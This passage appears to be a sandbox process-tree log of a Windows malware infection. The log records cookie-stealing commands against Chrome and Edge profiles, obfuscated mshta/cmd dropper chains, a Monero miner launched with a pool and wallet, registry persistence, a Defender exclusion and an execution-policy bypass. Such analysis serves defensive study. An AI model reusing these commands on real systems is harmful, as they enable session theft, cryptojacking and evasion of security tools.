  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
  2⤵
  PID:3368
- C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:7892
- C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
  2⤵
  PID:6660
- C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:6728
- C:\Users\Admin\AppData\Local\Temp\22222.exe
  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
  2⤵
  PID:7088

C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
1⤵
- Executes dropped EXE
PID:4148
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:5864
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:4168
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:10628
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:11144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe") do taskkill -IM "%~nXW" -f
1⤵
PID:5080
- C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
  WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
  2⤵
  - Executes dropped EXE
  PID:4260
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
    3⤵
    PID:864
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
      4⤵
      PID:5760
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
    3⤵
    PID:4356
- C:\Windows\SysWOW64\taskkill.exe
  taskkill -IM "imnJqNCKqtnJ0H5aawNCzZTY.exe" -f
  2⤵
  - Kills process with taskkill
  PID:204

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
1⤵
- Executes dropped EXE
PID:4280

C:\Users\Admin\AppData\Local\Temp\is-RGU14.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-RGU14.tmp\Setup.exe" /Verysilent
1⤵
PID:5800
- C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
  2⤵
  PID:208
- - C:\Users\Admin\AppData\Local\Temp\is-B09SA.tmp\Stats.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-B09SA.tmp\Stats.tmp" /SL5="$201F2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
    3⤵
    PID:5588
  - - C:\Users\Admin\AppData\Local\Temp\is-TRCHN.tmp\builder.exe
      "C:\Users\Admin\AppData\Local\Temp\is-TRCHN.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
      4⤵
      PID:204
- C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
  2⤵
  PID:3728
- - C:\Users\Admin\AppData\Local\Temp\is-OGAVR.tmp\Inlog.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-OGAVR.tmp\Inlog.tmp" /SL5="$501D2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
    3⤵
    PID:3736
  - - C:\Users\Admin\AppData\Local\Temp\is-3UGJ7.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-3UGJ7.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
      4⤵
      PID:6548
    - - C:\Users\Admin\AppData\Local\Temp\is-JQNF6.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-JQNF6.tmp\Setup.tmp" /SL5="$104E4,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-3UGJ7.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
        5⤵
        
        PID:6328
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-5OM2F.tmp\{app}\microsoft.cab -F:* %ProgramData%
        6⤵
        
        PID:6224
        
        C:\Windows\SysWOW64\expand.exe
        
        expand C:\Users\Admin\AppData\Local\Temp\is-5OM2F.tmp\{app}\microsoft.cab -F:* C:\ProgramData
        7⤵
        
        PID:5928
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
        6⤵
        
        PID:9540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
        7⤵
        
        PID:5216
      - C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
        
        "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
        6⤵
        
        PID:5212
      - C:\Users\Admin\AppData\Local\Temp\is-5OM2F.tmp\{app}\vdi_compiler.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-5OM2F.tmp\{app}\vdi_compiler"
        6⤵
        
        PID:10496
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-5OM2F.tmp\{app}\vdi_compiler.exe"
        7⤵
        
        PID:9644
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping localhost -n 4
        8⤵
        Runs ping.exe
        
        PID:6400
      - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^&param=721
        6⤵
        
        PID:10988
- C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
  2⤵
  PID:604
- - C:\Users\Admin\AppData\Local\Temp\is-M8M7G.tmp\WEATHER Manager.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-M8M7G.tmp\WEATHER Manager.tmp" /SL5="$50084,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
    3⤵
    PID:6084
  - - C:\Users\Admin\AppData\Local\Temp\is-32VBD.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-32VBD.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
      4⤵
      PID:6588
    - - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-32VBD.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-32VBD.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
        5⤵
        
        PID:880
- C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
  2⤵
  PID:5296
- - C:\Users\Admin\AppData\Local\Temp\is-4L035.tmp\VPN.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-4L035.tmp\VPN.tmp" /SL5="$30086,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
    3⤵
    PID:5924
  - - C:\Users\Admin\AppData\Local\Temp\is-SP8HT.tmp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\is-SP8HT.tmp\Setup.exe" /silent /subid=720
      4⤵
      PID:6712
    - - C:\Users\Admin\AppData\Local\Temp\is-PHR9Q.tmp\Setup.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-PHR9Q.tmp\Setup.tmp" /SL5="$30292,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-SP8HT.tmp\Setup.exe" /silent /subid=720
        5⤵
        
        PID:5644
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
        6⤵
        
        PID:604
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe remove tap0901
        7⤵
        
        PID:7268
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
        6⤵
        
        PID:5728
        
        C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
        
        tapinstall.exe install OemVista.inf tap0901
        7⤵
        
        PID:9836
      - C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
        6⤵
        
        PID:6188
      - C:\Program Files (x86)\MaskVPN\mask_svc.exe
        
        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
        6⤵
        
        PID:3604
- C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
  2⤵
  PID:5708
- - C:\Users\Admin\AppData\Roaming\6783013.exe
    "C:\Users\Admin\AppData\Roaming\6783013.exe"
    3⤵
    PID:6784
- - C:\Users\Admin\AppData\Roaming\5082383.exe
    "C:\Users\Admin\AppData\Roaming\5082383.exe"
    3⤵
    PID:6828
- - C:\Users\Admin\AppData\Roaming\5806440.exe
    "C:\Users\Admin\AppData\Roaming\5806440.exe"
    3⤵
    PID:6816
- - C:\Users\Admin\AppData\Roaming\1679869.exe
    "C:\Users\Admin\AppData\Roaming\1679869.exe"
    3⤵
    PID:6744
- - C:\Users\Admin\AppData\Roaming\8536475.exe
    "C:\Users\Admin\AppData\Roaming\8536475.exe"
    3⤵
    PID:6568
- C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
  2⤵
  PID:5556
- - C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
    "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
    3⤵
    PID:1884
- C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
  2⤵
  PID:5908
- - C:\Users\Admin\Documents\3Y_1x7gh1z1rHBsh5mQLGr13.exe
    "C:\Users\Admin\Documents\3Y_1x7gh1z1rHBsh5mQLGr13.exe"
    3⤵
    PID:3736
- - C:\Users\Admin\Documents\z5a2mfHIHsxnXyrtiXLjRJ3n.exe
    "C:\Users\Admin\Documents\z5a2mfHIHsxnXyrtiXLjRJ3n.exe"
    3⤵
    PID:3120
- - C:\Users\Admin\Documents\j_WX97RqmHxX3zJCF0hHPmjk.exe
    "C:\Users\Admin\Documents\j_WX97RqmHxX3zJCF0hHPmjk.exe"
    3⤵
    PID:6520
- - C:\Users\Admin\Documents\3vRkeDtLblgpCJooapoXI95J.exe
    "C:\Users\Admin\Documents\3vRkeDtLblgpCJooapoXI95J.exe"
    3⤵
    PID:716
  - - C:\Users\Admin\Documents\3vRkeDtLblgpCJooapoXI95J.exe
      "C:\Users\Admin\Documents\3vRkeDtLblgpCJooapoXI95J.exe"
      4⤵
      PID:7356
- - C:\Users\Admin\Documents\inb9lTjy7HEyKrD7Q7KmSeT7.exe
    "C:\Users\Admin\Documents\inb9lTjy7HEyKrD7Q7KmSeT7.exe"
    3⤵
    PID:4060
- - C:\Users\Admin\Documents\8SwH3ocAwOrFMXeyxs3rJIXW.exe
    "C:\Users\Admin\Documents\8SwH3ocAwOrFMXeyxs3rJIXW.exe"
    3⤵
    PID:64
- - C:\Users\Admin\Documents\HCVx0QdihyW04lz9KHftYFJq.exe
    "C:\Users\Admin\Documents\HCVx0QdihyW04lz9KHftYFJq.exe"
    3⤵
    PID:6360
  - - C:\Users\Admin\AppData\Roaming\3111292.exe
      "C:\Users\Admin\AppData\Roaming\3111292.exe"
      4⤵
      PID:7344
  - - C:\Users\Admin\AppData\Roaming\4175438.exe
      "C:\Users\Admin\AppData\Roaming\4175438.exe"
      4⤵
      PID:6908
  - - C:\Users\Admin\AppData\Roaming\4899496.exe
      "C:\Users\Admin\AppData\Roaming\4899496.exe"
      4⤵
      PID:2720
  - - C:\Users\Admin\AppData\Roaming\4760343.exe
      "C:\Users\Admin\AppData\Roaming\4760343.exe"
      4⤵
      PID:8252
- - C:\Users\Admin\Documents\BmcrnDlxCZpVAXWZ0ep2tctm.exe
    "C:\Users\Admin\Documents\BmcrnDlxCZpVAXWZ0ep2tctm.exe"
    3⤵
    PID:7196
  - - C:\Users\Admin\Documents\BmcrnDlxCZpVAXWZ0ep2tctm.exe
      "C:\Users\Admin\Documents\BmcrnDlxCZpVAXWZ0ep2tctm.exe"
      4⤵
      PID:9404
- - C:\Users\Admin\Documents\x0_mW6hSpSEGikUVFbTOUd6g.exe
    "C:\Users\Admin\Documents\x0_mW6hSpSEGikUVFbTOUd6g.exe"
    3⤵
    PID:7232
  - - C:\Users\Admin\Documents\x0_mW6hSpSEGikUVFbTOUd6g.exe
      "C:\Users\Admin\Documents\x0_mW6hSpSEGikUVFbTOUd6g.exe" -q
      4⤵
      PID:8184
- - C:\Users\Admin\Documents\3D1tw8uo4T9aJ48rgbV8rAl2.exe
    "C:\Users\Admin\Documents\3D1tw8uo4T9aJ48rgbV8rAl2.exe"
    3⤵
    PID:7332
- - C:\Users\Admin\Documents\E6PmShDpnwOh1xRDmvpptK4l.exe
    "C:\Users\Admin\Documents\E6PmShDpnwOh1xRDmvpptK4l.exe"
    3⤵
    PID:7448
  - - C:\Users\Admin\Documents\E6PmShDpnwOh1xRDmvpptK4l.exe
      C:\Users\Admin\Documents\E6PmShDpnwOh1xRDmvpptK4l.exe
      4⤵
      PID:5312
- - C:\Users\Admin\Documents\R13pFY4T7QGJdq63wNtCzk3O.exe
    "C:\Users\Admin\Documents\R13pFY4T7QGJdq63wNtCzk3O.exe"
    3⤵
    PID:7584
- - C:\Users\Admin\Documents\5WN7UH9zt9HhlzYd6fgvL4iu.exe
    "C:\Users\Admin\Documents\5WN7UH9zt9HhlzYd6fgvL4iu.exe"
    3⤵
    PID:7656
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\5WN7UH~1.DLL,s C:\Users\Admin\DOCUME~1\5WN7UH~1.EXE
      4⤵
      PID:11212
    - - C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5WN7UH~1.DLL,My4F
        5⤵
        
        PID:8780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\5WN7UH~1.DLL
        6⤵
        
        PID:4236
      - C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\5WN7UH~1.DLL,aBtMZlE=
        6⤵
        
        PID:3168
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp89D5.tmp.ps1"
        6⤵
        
        PID:9656
- - C:\Users\Admin\Documents\QSU2klcWJW8WhBZ2nW_e7Ot1.exe
    "C:\Users\Admin\Documents\QSU2klcWJW8WhBZ2nW_e7Ot1.exe"
    3⤵
    PID:7692
- - C:\Users\Admin\Documents\JNRZUr_EUZv6bPSJdRpJmorW.exe
    "C:\Users\Admin\Documents\JNRZUr_EUZv6bPSJdRpJmorW.exe"
    3⤵
    PID:7788
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "JNRZUr_EUZv6bPSJdRpJmorW.exe" /f & erase "C:\Users\Admin\Documents\JNRZUr_EUZv6bPSJdRpJmorW.exe" & exit
      4⤵
      PID:8512
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "JNRZUr_EUZv6bPSJdRpJmorW.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:8228
- - C:\Users\Admin\Documents\yCkzNQGGp8htFoR9j0Z3c3Y9.exe
    "C:\Users\Admin\Documents\yCkzNQGGp8htFoR9j0Z3c3Y9.exe"
    3⤵
    PID:7832
- - C:\Users\Admin\Documents\YyCi1MMPw0mEFigjNR6w7myZ.exe
    "C:\Users\Admin\Documents\YyCi1MMPw0mEFigjNR6w7myZ.exe"
    3⤵
    PID:7872
- - C:\Users\Admin\Documents\j4vzwde3il5BijuUpvCdEH5j.exe
    "C:\Users\Admin\Documents\j4vzwde3il5BijuUpvCdEH5j.exe"
    3⤵
    PID:7768
- - C:\Users\Admin\Documents\vawptKtDD9hYtNsWK5jxxViR.exe
    "C:\Users\Admin\Documents\vawptKtDD9hYtNsWK5jxxViR.exe"
    3⤵
    PID:7640
  - - C:\Users\Admin\Documents\vawptKtDD9hYtNsWK5jxxViR.exe
      C:\Users\Admin\Documents\vawptKtDD9hYtNsWK5jxxViR.exe
      4⤵
      PID:4240
- - C:\Users\Admin\Documents\f4UQ_APM_XuFuRcMBmolf1Ut.exe
    "C:\Users\Admin\Documents\f4UQ_APM_XuFuRcMBmolf1Ut.exe"
    3⤵
    PID:7248
  - - C:\Users\Admin\AppData\Local\Temp\is-4DR5G.tmp\f4UQ_APM_XuFuRcMBmolf1Ut.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-4DR5G.tmp\f4UQ_APM_XuFuRcMBmolf1Ut.tmp" /SL5="$30572,138429,56832,C:\Users\Admin\Documents\f4UQ_APM_XuFuRcMBmolf1Ut.exe"
      4⤵
      PID:4388
    - - C:\Users\Admin\AppData\Local\Temp\is-QOMKK.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-QOMKK.tmp\Setup.exe" /Verysilent
        5⤵
        
        PID:8860
      - C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
        
        "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
        6⤵
        
        PID:9000
        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
        7⤵
        
        PID:7364
- - C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe
    "C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe"
    3⤵
    PID:7556
  - - C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
      4⤵
      PID:8100
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\2zxNwrsJsBP6buhehOwu6j8N.exe") do taskkill -IM "%~nXW" -f
        5⤵
        
        PID:5740
      - C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
        
        WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
        6⤵
        
        PID:8008
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
        7⤵
        
        PID:3260
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
        8⤵
        
        PID:8632
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
        7⤵
        
        PID:8504
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -IM "2zxNwrsJsBP6buhehOwu6j8N.exe" -f
        6⤵
        Kills process with taskkill
        
        PID:7028
- - C:\Users\Admin\Documents\ldMtqD0076KTtXLFy_i7HsdG.exe
    "C:\Users\Admin\Documents\ldMtqD0076KTtXLFy_i7HsdG.exe"
    3⤵
    PID:7512
  - - C:\Users\Admin\Documents\ldMtqD0076KTtXLFy_i7HsdG.exe
      "C:\Users\Admin\Documents\ldMtqD0076KTtXLFy_i7HsdG.exe"
      4⤵
      PID:6108
- - C:\Users\Admin\Documents\pkObKDvVAPQxFsLMPQm9j2uE.exe
    "C:\Users\Admin\Documents\pkObKDvVAPQxFsLMPQm9j2uE.exe"
    3⤵
    PID:7396
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im "pkObKDvVAPQxFsLMPQm9j2uE.exe" /f & erase "C:\Users\Admin\Documents\pkObKDvVAPQxFsLMPQm9j2uE.exe" & exit
      4⤵
      PID:7540
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "pkObKDvVAPQxFsLMPQm9j2uE.exe" /f
        5⤵
        Kills process with taskkill
        
        PID:7460
- - C:\Users\Admin\Documents\V5mcyEiwwZNywHkPovDmJiS8.exe
    "C:\Users\Admin\Documents\V5mcyEiwwZNywHkPovDmJiS8.exe"
    3⤵
    PID:7280
- - C:\Users\Admin\Documents\AeriRX_zVhaAw4EQbUsuldRm.exe
    "C:\Users\Admin\Documents\AeriRX_zVhaAw4EQbUsuldRm.exe"
    3⤵
    PID:5088
- C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
  2⤵
  PID:5964
- C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
  2⤵
  PID:5252
- - C:\Windows\SysWOW64\msiexec.exe
    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579446 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
    3⤵
    PID:5968
- C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
  "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
  2⤵
  PID:4216
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 756
    3⤵
    - Program crash
    PID:4312
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 788
    3⤵
    - Program crash
    PID:716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 792
    3⤵
    - Program crash
    PID:1776
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 820
    3⤵
    - Program crash
    PID:7140
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 952
    3⤵
    - Program crash
    PID:4264
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4216 -s 980
    3⤵
    - Program crash
